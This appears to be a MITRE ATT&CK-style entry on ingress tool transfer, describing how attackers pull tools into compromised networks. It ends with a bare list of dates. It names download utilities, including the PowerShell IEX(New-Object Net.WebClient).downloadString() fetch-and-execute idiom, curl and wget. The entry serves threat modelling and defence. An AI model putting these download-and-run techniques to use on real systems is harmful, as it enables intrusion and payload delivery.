Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString()
and Invoke-WebRequest
. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
2022-12-13
2022-05-24
2022-04-19
2022-03-15
2022-03-01
2021-10-19
2021-10-05
2021-09-07
2021-08-16
2021-08-10
2021-08-10
2021-07-06